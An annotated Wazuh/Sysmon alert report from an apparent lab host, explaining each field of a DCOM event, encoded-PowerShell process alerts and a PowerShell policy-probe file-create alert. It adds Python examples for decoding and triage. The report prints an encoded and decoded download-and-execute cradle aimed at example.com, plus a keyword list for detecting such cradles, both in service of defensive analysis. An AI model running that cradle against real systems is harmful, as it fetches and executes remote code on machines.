decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-DistributedCOM
ETW provider that wrote the event: the DCOM runtime, logging to the System channel.

data.win.system.providerGuid:  {1B562E86-B7AA-4131-BADC-B6F3A001407E}
GUID of that provider.

data.win.system.eventSourceName:  DCOM
Legacy event-source name; present because this is a classic (pre-ETW style) event, see keywords below.

data.win.system.eventID:  10010
Event ID. IDs are only unique per provider: 10010 here is the DCOM "server did not register within the required timeout" error and has nothing to do with any Security-log ID.

data.win.system.version:  0
Schema version of the event.

data.win.system.level:  2
ETW level: 1 Critical, 2 Error, 3 Warning, 4 Information, 5 Verbose. 2 = Error.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.). 0 = none.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8080000000000000
Bit‑flag keywords set by Windows. 0x8080000000000000 = Classic (written through the legacy event-log API).

data.win.system.systemTime:  2025-04-24T22:54:50.1356572Z
When the endpoint wrote the event (UTC), about 4 s before the Wazuh timestamp.

data.win.system.eventRecordID:  3069
Incremental log record number – handy for timeline order.

data.win.system.processID:  336
PID of the process that logged the event.

data.win.system.threadID:  17180
Thread inside that process.

data.win.system.channel:  System
Event log channel. System holds service, driver and DCOM housekeeping, not audit data.

data.win.system.computer:  Attacker
Hostname the event was recorded on; should match agent.name.

data.win.system.severityValue:  ERROR
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The server {8CFC164F-4BE5-4FDD-94E9-E2AF73ED4A19} did not register with DCOM within the required timeout."
A COM server with this CLSID was asked to start but did not register with DCOM in time. Extremely common and almost always an application or service timing problem rather than an attack; the Medium label here comes purely from the behaviour score. To find out what the CLSID is, look it up under HKEY_CLASSES_ROOT\CLSID\{8CFC164F-4BE5-4FDD-94E9-E2AF73ED4A19} on the host and check whether the registered server path is the expected binary. Escalate only if the CLSID resolves to an unknown binary, or if it clusters with the PowerShell activity that follows at 22:55.

data.win.eventdata.param1:  {8CFC164F-4BE5-4FDD-94E9-E2AF73ED4A19}
The only parsed parameter: the CLSID from the message, in a field you can aggregate on (the same CLSID repeating across hosts is a broken product, not a compromise).

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:55:26.668+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:55:26.668+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  113
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535326.2666249
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event: Sysmon (System Monitor), not a built-in Windows log.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
Sysmon's provider GUID, constant across Sysmon versions.

data.win.system.eventID:  1
Event ID. Sysmon IDs are their own namespace: 1 = Process Create (the Sysmon counterpart of Security 4688, but with hashes, process GUIDs and the parent command line).

data.win.system.version:  5
Sysmon event schema version; v5 of Event 1 is the one that carries the ParentUser field seen below.

data.win.system.level:  4
ETW level. 4 = Information. Sysmon logs everything as informational; the rule level, not this field, carries the severity.

data.win.system.task:  1
Task category; for Sysmon it mirrors the event ID (1 = Process Create).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows. Only the reserved top bit is set; no audit semantics here.

data.win.system.systemTime:  2025-04-24T22:55:23.7159287Z
When Sysmon wrote the event (UTC). Note the gap to eventdata.utcTime below (the process actually started at 22:55:21.968) and to the Wazuh timestamp (22:55:26.668).

data.win.system.eventRecordID:  350093
Incremental log record number – handy for timeline order. The neighbouring records 350094 and 350117 are the related file-create and child-process alerts in this report.

data.win.system.processID:  3712
PID of the Sysmon service itself, which logged the event; not the PID of the process that was created (that is eventdata.processId).

data.win.system.threadID:  4740
Thread inside the Sysmon service.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel. Wazuh has to be configured to read this channel explicitly.

data.win.system.computer:  Attacker
Hostname the event was recorded on; should match agent.name.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:55:21.968 ProcessGuid: {94294ddc-c159-680a-cb0c-000000000e00} ProcessId: 14568 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bbde-680a-d909-000000000e00} ParentProcessId: 14832 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ParentUser: Attacker\Attcker1"
Full Sysmon text; the eventdata.* fields below are its parsed form. The key fact: a PowerShell console (parent PID 14832, plain powershell.exe, run by Attacker\Attcker1) spawned a second powershell.exe with -NoLogo -NoProfile -EncodedCommand. The blob is base64 over UTF-16LE; decoded it reads IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), a download-and-execute cradle that fetches a script and runs it in memory without writing it to disk. The destination is the reserved example.com domain, so this looks like a test or lab run, but the technique is exactly what the rule exists to catch. Decode every encoded command before triaging: the URL and the verbs (IEX, DownloadString) are the whole story.

data.win.eventdata.utcTime:  2025-04-24 22:55:21.968
Process creation time as recorded by Sysmon (UTC). This, not the Wazuh timestamp, is the time to put on the incident timeline.

data.win.eventdata.processGuid:  {94294ddc-c159-680a-cb0c-000000000e00}
Sysmon's process GUID (machine GUID + boot session + start time). Unlike a PID it is never reused, so join on it: the file-create alert and the child process in the next alert both reference this GUID.

data.win.eventdata.processId:  14568
PID of the new process. Fine for pivots within one boot, but PIDs are recycled; prefer processGuid.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Full path of the executable: Windows PowerShell 5.1 (the v1.0 folder name is historical).

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
Version resource of the binary; 10.0.26100 is the Windows build 26100 line. Useful for spotting an out-of-place or old copy of a system binary.

data.win.eventdata.description:  Windows PowerShell
PE version-info Description.

data.win.eventdata.product:  Microsoft® Windows® Operating System
PE version-info Product name.

data.win.eventdata.company:  Microsoft Corporation
PE version-info Company. These three fields come from the file itself and are trivial to forge in a custom binary; they are not a signature check.

data.win.eventdata.originalFileName:  PowerShell.EXE
Name compiled into the PE. Compare with the last component of image: a mismatch (image calc.exe, OriginalFileName PowerShell.EXE) is the classic renamed-binary evasion (T1036). Here they agree.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
The full command line. Notable here: the powershell.exe path appears twice (the second copy is passed as an argument), then -NoLogo -NoProfile (skip the banner and the user's profile scripts, standard for automation and for attackers alike) and -EncodedCommand with a base64 blob. The encoding is UTF-16LE, so a plain base64 decode shows NUL bytes between characters; decoded properly it is IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'). Also watch for the abbreviations -e, -ec and -enc, which rules keyed only on the long form miss.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
Working directory of the new process: the user's profile root, i.e. launched from an interactive shell rather than a service path.

data.win.eventdata.user:  Attacker\\Attcker1
Account the process runs as: local user Attcker1 on host Attacker (WORKGROUP, so no domain prefix).

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
Sysmon's identifier for the logon session the process belongs to.

data.win.eventdata.logonId:  0x26584
Windows Logon ID of that session. Pivot to the Security 4624 with targetLogonId 0x26584 to see how Attcker1 got in (logon type, source address). It is not 0x3e7, so this is a user session, not SYSTEM.

data.win.eventdata.terminalSessionId:  1
Windows session number. 1 = the first interactive (console or RDP) session; 0 would be services.

data.win.eventdata.integrityLevel:  Medium
Token integrity. Medium = a standard, non-elevated user; High would mean an elevated (admin) PowerShell.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
Hash of the image on disk. Check it against a known-good powershell.exe for this build (or a threat-intel lookup) to rule out a tampered binary; the same hash should appear on every powershell.exe event from this host.

data.win.eventdata.parentProcessGuid:  {94294ddc-bbde-680a-d909-000000000e00}
GUID of the parent. Search Sysmon Event 1 for this processGuid to see who started the console.

data.win.eventdata.parentProcessId:  14832
PID of the parent.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Parent executable: another powershell.exe, hence the rule name. A PowerShell parent is less alarming than winword.exe or a browser; the encoded payload is what matters.

data.win.eventdata.parentCommandLine:  \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"
Parent command line: a bare powershell.exe, i.e. an interactive console someone typed into.

data.win.eventdata.parentUser:  Attacker\\Attcker1
Account of the parent, the same user, so no privilege change between parent and child.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.
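Added example (Python, not SOCscribe or Wazuh code): the decode step the alert above calls for. It pulls the blob after -EncodedCommand (or its -e/-ec/-enc abbreviations) out of the Sysmon CommandLine, base64-decodes it as UTF-16LE the way PowerShell encodes it, and tags download-and-execute verbs. CMDLINE is copied from this alert; the CRADLE_MARKERS list is the example's own choice of verbs.

```python
"""Decode a PowerShell -EncodedCommand blob from a Sysmon Event 1 CommandLine.

Added example, not SOCscribe/Wazuh code. CMDLINE is copied from the alert above;
the CRADLE_MARKERS list is this example's own choice of verbs worth flagging.
"""
import base64
import binascii
import re

# -EncodedCommand and its common abbreviations (-e, -ec, -en, -enc), case-insensitive,
# introduced by '-' or '/', followed by the base64 blob.
ENC_FLAG = re.compile(r"(?i)[-/]e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")

# Download-and-execute verbs; a hit on two or more is a cradle until proven otherwise.
CRADLE_MARKERS = ("iex", "invoke-expression", "downloadstring", "downloadfile",
                  "net.webclient", "invoke-webrequest", "frombase64string")


def extract_encoded(cmdline):
    """Return the base64 text after the encoded-command switch, or None if there is none."""
    m = ENC_FLAG.search(cmdline)
    return m.group(1) if m else None


def decode_encoded_command(blob):
    """PowerShell base64-encodes the script as UTF-16LE, so decode the bytes as UTF-16LE,
    not UTF-8 (a UTF-8 decode shows a NUL between every character)."""
    raw = base64.b64decode(blob, validate=True)
    return raw.decode("utf-16-le")


def analyse_cmdline(cmdline):
    """Decode and tag one command line. Malformed blobs are reported, not raised, so a
    batch run over many alerts keeps going."""
    blob = extract_encoded(cmdline)
    if blob is None:
        return {"encoded": False, "script": None, "markers": []}
    try:
        script = decode_encoded_command(blob)
    except (binascii.Error, UnicodeDecodeError) as exc:
        return {"encoded": True, "script": None, "markers": [], "error": str(exc)}
    low = script.lower()
    return {"encoded": True, "script": script, "markers": [m for m in CRADLE_MARKERS if m in low]}


# CommandLine value from the Sysmon Event 1 above (blob unchanged).
CMDLINE = (
    '"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    '"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    "-NoLogo -NoProfile -EncodedCommand "
    "SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4A"
    "RABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA"
)

if __name__ == "__main__":
    print(analyse_cmdline(CMDLINE))
```

On this alert the script decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test') with iex, downloadstring and net.webclient flagged. The validate=True decode rejects blobs with stray characters, and an odd byte count (a truncated blob) fails the UTF-16LE decode; both come back as an error entry rather than an exception.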

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:55:27.365+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:55:27.365+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  117
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535327.2673135
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event: Sysmon.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
Sysmon's provider GUID.

data.win.system.eventID:  11
Sysmon event ID. 11 = FileCreate (a file was created or overwritten); not a Security-log ID.

data.win.system.version:  2
Sysmon event schema version for Event 11.

data.win.system.level:  4
ETW level 4 = Information; severity lives in the rule level, not here.

data.win.system.task:  11
Task category; mirrors the Sysmon event ID (11 = File created).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows. Only the reserved top bit is set.

data.win.system.systemTime:  2025-04-24T22:55:24.7769762Z
When Sysmon wrote the event (UTC), 2.8 s after the process in the previous alert started.

data.win.system.eventRecordID:  350094
Incremental log record number: the record right after the Process Create above (350093).

data.win.system.processID:  3712
PID of the Sysmon service that logged the event, not of the writer (see eventdata.processId).

data.win.system.threadID:  4740
Thread inside the Sysmon service.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel.

data.win.system.computer:  Attacker
Hostname the event was recorded on; should match agent.name.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:55:24.705 ProcessGuid: {94294ddc-c159-680a-cb0c-000000000e00} ProcessId: 14568 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_asllzuor.2bv.ps1 CreationUtcTime: 2025-04-24 22:55:24.702 User: Attacker\Attcker1"
Full Sysmon text; the fields below are its parsed form. Read the TargetFilename before trusting the rule name: __PSScriptPolicyTest_<random>.ps1 in %TEMP% is the probe file powershell.exe writes at start-up to test whether AppLocker/WDAC script enforcement applies, so one appears for practically every PowerShell launch. That makes this specific hit a known false positive for rule 92213, and the T1105 (Ingress Tool Transfer) tag is wrong for it: nothing was downloaded. What is worth keeping is the ProcessGuid: {94294ddc-c159-680a-cb0c-000000000e00} is the encoded-command PowerShell from the previous alert, so this event confirms that process was running, not that it dropped a tool.

data.win.eventdata.utcTime:  2025-04-24 22:55:24.705
When Sysmon observed the create (UTC).

data.win.eventdata.processGuid:  {94294ddc-c159-680a-cb0c-000000000e00}
GUID of the process that wrote the file. Identical to the processGuid in the previous alert: the writer is PID 14568, the powershell.exe running the encoded DownloadString cradle.

data.win.eventdata.processId:  14568
PID of the writer; prefer processGuid for joins.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Executable that wrote the file.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_asllzuor.2bv.ps1
Path created. %LOCALAPPDATA%\Temp is why the rule fired ("folder commonly used by malware"); the __PSScriptPolicyTest_ prefix with a random 8.3-style name is PowerShell's own script-policy probe, not a payload. Tuning: exclude this name pattern when image is powershell.exe, and let the rule keep catching .exe/.dll/.ps1 drops with other names.

data.win.eventdata.creationUtcTime:  2025-04-24 22:55:24.702
The file's own creation timestamp. If it is much older than utcTime the file already existed and was overwritten, or its creation time was tampered with (Sysmon Event 2).

data.win.eventdata.user:  Attacker\\Attcker1
Account that wrote the file, the same local user as the process chain.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.
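Added example (Python, not SOCscribe or Wazuh code) serving this file-create alert and the two encoded-PowerShell Event 1 alerts around it: join Sysmon events on ProcessGuid, walk the parent chain, and judge a file drop by who wrote it rather than by the folder alone. EVENTS is constructed from the GUIDs, PIDs, paths and encoded blob in this report; the noise/pivot/review labels are the example's own.

```python
"""Join Sysmon Event 1 (process create) and Event 11 (file create) on ProcessGuid.

Added example, not SOCscribe/Wazuh code. EVENTS is constructed from the three
Sysmon alerts in this report (GUIDs, PIDs, paths and the encoded blob copied
from them); the noise/pivot/review labels are this example's own.
"""
import re

PS_EXE = r"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe"
ENC_BLOB = ("SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4A"
            "RABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA")
ENC_CMDLINE = '"%s" "%s" -NoLogo -NoProfile -EncodedCommand %s' % (PS_EXE, PS_EXE, ENC_BLOB)

# Encoded-command switch (-e/-ec/-en/-enc/-EncodedCommand) as a whole token.
ENCODED_FLAG = re.compile(r"(?i)\s[-/]e(?:c|n|nc|ncodedcommand)?\s")
# PowerShell's start-up script-policy probe: __PSScriptPolicyTest_<random>.<random>.ps1 in %TEMP%.
PS_POLICY_PROBE = re.compile(r"(?i)\\__PSScriptPolicyTest_[^\\]+\.ps1$")

EVENTS = [
    {"eventID": 1, "utcTime": "2025-04-24 22:55:21.968",
     "processGuid": "{94294ddc-c159-680a-cb0c-000000000e00}", "processId": 14568,
     "image": PS_EXE, "commandLine": ENC_CMDLINE,
     "parentProcessGuid": "{94294ddc-bbde-680a-d909-000000000e00}", "parentProcessId": 14832},
    {"eventID": 11, "utcTime": "2025-04-24 22:55:24.705",
     "processGuid": "{94294ddc-c159-680a-cb0c-000000000e00}", "processId": 14568,
     "targetFilename": r"C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_asllzuor.2bv.ps1"},
    {"eventID": 1, "utcTime": "2025-04-24 22:55:27.053",
     "processGuid": "{94294ddc-c15f-680a-cf0c-000000000e00}", "processId": 15812,
     "image": PS_EXE, "commandLine": ENC_CMDLINE,
     "parentProcessGuid": "{94294ddc-c159-680a-cb0c-000000000e00}", "parentProcessId": 14568},
]


def build_tree(events):
    """Index Event 1 by ProcessGuid (never reused, unlike a PID) and hang children and
    created files off their process node."""
    procs = {}
    for ev in events:
        if ev["eventID"] == 1:
            procs[ev["processGuid"]] = {
                "pid": ev["processId"], "image": ev["image"], "cmdline": ev["commandLine"],
                "parent": ev["parentProcessGuid"], "children": [], "files": []}
    for ev in events:
        if ev["eventID"] == 1 and ev["parentProcessGuid"] in procs:
            procs[ev["parentProcessGuid"]]["children"].append(ev["processGuid"])
        elif ev["eventID"] == 11 and ev["processGuid"] in procs:
            procs[ev["processGuid"]]["files"].append(ev["targetFilename"])
    return procs


def lineage(procs, guid):
    """Process, parent, grandparent... stopping at the first GUID with no Event 1 in the
    data set (here the interactive console 14832, whose Event 1 is outside the report)."""
    chain, seen = [], set()
    while guid in procs and guid not in seen:
        seen.add(guid)
        chain.append(procs[guid])
        guid = procs[guid]["parent"]
    return chain


def assess_file_create(procs, file_event):
    """Verdict for one Event 11 based on the writer's ancestry, not just the folder."""
    chain = lineage(procs, file_event["processGuid"])
    probe = bool(PS_POLICY_PROBE.search(file_event["targetFilename"]))
    encoded = [p["pid"] for p in chain if ENCODED_FLAG.search(p["cmdline"])]
    if probe and not encoded:
        return "noise", "PowerShell script-policy probe from a plain PowerShell session"
    if probe and encoded:
        return "pivot", "script-policy probe, but the writer chain runs an encoded command (PIDs %s)" % encoded
    if not chain:
        return "review", "no Event 1 for the writing process; widen the search window"
    return "review", "unexpected file written by PID %d" % chain[0]["pid"]


if __name__ == "__main__":
    tree = build_tree(EVENTS)
    for guid, node in tree.items():
        print(node["pid"], "<-", [tree[g]["pid"] for g in lineage(tree, node["parent"])], node["files"])
    print(assess_file_create(tree, EVENTS[1]))
```

For this report the file-create resolves to "pivot": the path is the PowerShell policy probe (so no tool transfer happened), but the writer is the encoded-command process 14568, and the tree shows 15812 hanging off it with the same payload. The same probe written by a plain console would come out as noise, and a non-probe name in the same folder stays at review, which is the behaviour a tuned version of rule 92213 should reproduce.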

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:55:30.152+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:55:30.152+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  114
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535330.2675904
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event: Sysmon.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
Sysmon's provider GUID.

data.win.system.eventID:  1
Sysmon event ID 1 = Process Create.

data.win.system.version:  5
Sysmon event schema version (v5 includes ParentUser).

data.win.system.level:  4
ETW level 4 = Information.

data.win.system.task:  1
Task category; mirrors the Sysmon event ID.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows. Only the reserved top bit is set.

data.win.system.systemTime:  2025-04-24T22:55:27.5487001Z
When Sysmon wrote the event (UTC); the process itself started at 22:55:27.053 (eventdata.utcTime).

data.win.system.eventRecordID:  350117
Incremental log record number, 23 records after the file-create above, so other Sysmon events (350095–350116) sit between them and are worth pulling before drawing conclusions.

data.win.system.processID:  3712
PID of the Sysmon service, not of the created process.

data.win.system.threadID:  4740
Thread inside the Sysmon service.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel.

data.win.system.computer:  Attacker
Hostname the event was recorded on; should match agent.name.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

